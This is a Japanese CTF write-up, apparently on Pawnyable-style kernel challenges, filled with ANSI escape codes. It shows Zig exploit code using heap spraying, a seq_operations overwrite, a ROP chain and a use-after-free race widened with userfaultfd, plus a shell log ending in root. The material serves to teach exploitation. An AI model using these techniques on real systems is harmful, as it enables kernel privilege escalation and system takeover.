�[1m�[37m �[0m�[37madjust_offsets�[0m�[1m�[37m(�[0m�[1m�[37mkaslr_offset�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[37mshmFree�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mshm_addrs�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mstat_fds�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m1000�[0m�[1m�[37m]�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37mspray�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mstat_fds�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mdefer�[0m�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mstat_fds�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37msfd�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37mclose�[0m�[1m�[37m(�[0m�[1m�[37msfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[37m@memcpy�[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m[�[0m�[1m�[36m32�[0m�[1m�[36m+�[0m�[1m�[36m32�[0m�[1m�[37m..][�[0m�[37m@offsetOf�[0m�[1m�[37m(�[0m�[1m�[37mseq_operations�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33m"start"�[0m�[1m�[37m)..][�[0m�[1m�[36m0�[0m�[1m�[37m..�[0m�[1m�[36m8�[0m�[1m�[37m],�[0m�[1m�[37m �[0m�[1m�[37mstd�[0m�[1m�[37m.�[0m�[1m�[37mmem�[0m�[1m�[37m.�[0m�[37masBytes�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mADD_RSP_0xb8_POP_R13_POP_R14_POP_R15_POP_RBP�[0m�[1m�[37m));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mtry�[0m�[1m�[37m �[0m�[37moverwrite�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m&�[0m�[1m�[37mbuf�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mfor�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mstat_fds�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37msfd�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[37mropchain�[0m�[1m�[37m(�[0m�[1m�[37msfd�[0m�[1m�[37m);�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33m// let it crash!�[0m
�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37mwhoami�[0m
�[1m�[37m./exploit�[0m
�[37mecho�[0m�[1m�[37m �[0m�[33m'#!/bin/sh\n/usr/bin/whoami &> /tmp/whoisit\nchmod 777 /tmp/whoisit'�[0m�[1m�[37m > /tmp/x�[0m
�[1m�[37mchmod �[0m�[1m�[36m777�[0m�[1m�[37m /tmp/x�[0m
�[1m�[37mtouch /tmp/unknown�[0m
�[1m�[37mchmod �[0m�[1m�[36m777�[0m�[1m�[37m /tmp/unknown�[0m
�[1m�[37m/tmp/unknown �[0m�[1m�[37m&�[0m�[1m�[37m> /tmp/null�[0m
�[1m�[37mcat /tmp/whoisit�[0m
�[1m�[37mwhoami: unknown uid 1337�[0m
�[1m�[37m[INFO] Won the race�[0m
�[1m�[37m[INFO] Kernel base at 0xffffffff8e400000�[0m
�[1m�[37m[INFO] Won the race�[0m
�[1m�[37mSegmentation fault�[0m
�[1m�[37mroot�[0m
(DIR) 完全なexploit
セグフォルトによるエクスポロイトがクラッシュしたのはちょっとハック的だが、結局は権限昇格できた。
== �[1m�[4mFleckvieh�[22m�[24m
課題情報
�[1m�[37m[*] './fleckvieh/qemu/rootfs/root/fleckvieh.ko'�[0m
�[1m�[37m Arch: amd64-64-little�[0m
�[1m�[37m RELRO: No RELRO�[0m
�[1m�[37m Stack: No canary found�[0m
�[1m�[37m NX: NX enabled�[0m
�[1m�[37m PIE: No PIE (0x0)�[0m
�[1m�[37m Stripped: No�[0m
�[1m�[37msed -i -E �[0m�[33m"s|^(echo 2 > /proc/sys/kernel/kptr_restrict)|# \1|"�[0m�[1m�[37m rootfs/etc/init.d/S99pawnyable�[0m
�[1m�[37msed -i -E �[0m�[33m"s|^(echo 1 > /proc/sys/kernel/dmesg_restrict)|# \1|"�[0m�[1m�[37m rootfs/etc/init.d/S99pawnyable�[0m
�[1m�[37msed -i -E �[0m�[33m"s/(setuidgid) 1337 (sh)/\1 0 \2/"�[0m�[1m�[37m rootfs/etc/init.d/S99pawnyable�[0m
�[1m�[37m�[0m
�[1m�[37msed -i �[0m�[33m'/${DEBUG:+ -s} \\/d'�[0m�[1m�[37m run.sh�[0m
�[1m�[37msed -i -E �[0m�[33m'/qemu-system-x86_64 \\/a \ \ \ \ ${DEBUG:+ -s} \\'�[0m�[1m�[37m run.sh�[0m
�[1m�[37msed -i -E �[0m�[33m's/ kaslr/ ${NOKASLR:+no}kaslr/'�[0m�[1m�[37m run.sh�[0m
�[1m�[37msed -i �[0m�[33m'/-serial unix:vm.sock,server,nowait/d'�[0m�[1m�[37m run.sh�[0m
�[1m�[37msed -i -E �[0m�[33m'/-monitor \/dev\/null/a \ \ \ \ -serial unix:vm.sock,server,nowait \\'�[0m�[1m�[37m run.sh�[0m
�[1m�[37mSMEP enabled�[0m
�[1m�[37mSMAP enabled�[0m
�[1m�[37mKPTI enabled�[0m
�[1m�[37mKASLR enabled�[0m
ま、ごく普通の競合状態。
1. �[40m�[35m`blob_get`�[39m�[49mや�[40m�[35m`blob_set`�[39m�[49m
の中に�[40m�[35m`blob_list *victim =
blob_find_by_id(...)`�[39m�[49mを実行し
2. 他のスレードで�[40m�[35m`blob_del`�[39m�[49mを実行し、�[40m�[35m`victim`
�[39m�[49mを指すブロブを開放する
3. ヒープスプレー
4. �[40m�[35m`copy_to_user`�[39m�[49m/�[40m�[35m`copy_from_user`
�[39m�[49mに実行の時に�[40m�[35m`victim-
>data`�[39m�[49m(現在ダングリングポインタ)は選択したカネル構造体を指してる;AAR/AAW手に入れた
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfleckvieh�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mpub�[0m�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mops�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33menum�[0m�[1m�[37m(�[0m�[1m�[36mu32�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mADD�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xf1ec0001�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mDEL�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xf1ec0002�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mGET�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xf1ec0003�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mSET�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xf1ec0004�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mop�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mops�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mbuf�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m?�[0m�[1m�[37m[]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mid�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m?�[0m�[1m�[36mi32�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mi32�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mop�[0m�[1m�[37m �[0m�[1m�[36m!=�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mADD�[0m�[1m�[37m �[0m�[33mand�[0m�[1m�[37m �[0m�[1m�[37mid�[0m�[1m�[37m �[0m�[1m�[36m==�[0m�[1m�[37m �[0m�[1m�[36mnull�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[33merror�[0m�[1m�[37m.�[0m�[1m�[37mInvalidArgument�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mret�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mop�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mrequest_t�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mid�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mid�[0m�[1m�[37m �[0m�[33morelse�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37msize�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mbuf�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37mb�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[1m�[37mb�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mdata�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mif�[0m�[1m�[37m �[0m�[0m...
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mret�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[37m@intCast�[0m�[1m�[37m(�[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mi64�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@bitCast�[0m�[1m�[37m(�[0m�[1m�[37mret�[0m�[1m�[37m))),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37me�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37me�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mrequest_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mid�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37msize�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mdata�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m*�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mblob_list�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mstruct_head�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mnext�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[1m�[37mstruct_head�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mprev�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36m*�[0m�[1m�[37mstruct_head�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mid�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi32�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37msize�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36musize�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mdata�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[�[0m�[1m�[36m*�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mlist�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mstruct_head�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m};�[0m�[1m�[37m�[0m
だが競合状態を悪用する好機(�[40m�[35m`blob_find_by_id`�[39m�[49mと�[40m�[35m`c
opy_from_user`�[39m�[49mの間)は短すぎる。
時間を稼げる方法を二つ紹介する⸺userfaultfdとFUSE。
=== �[1m�[4muserfaultfd�[22m�[24m
userfaultfdはページフォルトをユーザー空間の中に対処するものだ。
「なぜそんなもん役立つか?」と聞いてるだろう。
いくつかの正当な使用例はあるだろう、だがpwnの場合なら価値はカーネルスレードを停滞することだ。
この悪用能力はかなりやばいから、この機能(具体的にはカネル空間に由来するページフォルト)はLinux
5.2で特権が必要な行動になった。[^fn:7]
まずはuserfaultfdのハローワールド [5]を実装しろう。
�[1m�[36m<<�[0m�[1m�[37mpin�[0m�[1m�[36m-�[0m�[1m�[37mto�[0m�[1m�[36m-�[0m�[1m�[37mcore�[0m�[1m�[36m>>�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[33mconst�[0m�[1m�[37m �[0m�[1m�[37muserfaultfd�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mpub�[0m�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mmsg�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mpacked�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mpub�[0m�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mEVENT�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33menum�[0m�[1m�[37m(�[0m�[1m�[36mu8�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mPAGEFAULT�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0x12�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mFORK�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mREMAP�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mREMOVE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mUNMAP�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mevent�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mEVENT�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_reserved1�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_reserved2�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu16�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_reserved3�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37marg�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[33mpacked�[0m�[1m�[37m �[0m�[33munion�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mpagefault�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[33mpacked�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mpub�[0m�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mFLAG�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mpacked�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mWRITE�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mWP�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mMINOR�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mu61�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mflags�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mFLAG�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37maddress�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mfeat�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[33mpacked�[0m�[1m�[37m �[0m�[33munion�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37mptid�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu32�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mfork�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[33mpacked�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37mufd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu32�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mremap�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[33mpacked�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mfrom�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mto�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mlen�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mremove�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[33mpacked�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstart�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mend�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_reserved�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[33mpacked�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_reserved1�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_reserved2�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_reserved3�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37muffdio_api�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mpub�[0m�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mFEATURE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mpacked�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mPAGEFAULT_FLAG_WP�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mEVENT_FORK�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mEVENT_REMAP�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mEVENT_REMOVE�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mMISSING_HUGETLBFS�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mMISSING_SHMEM�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mEVENT_UNMAP�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mSIGBUS�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mTHREAD_ID�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
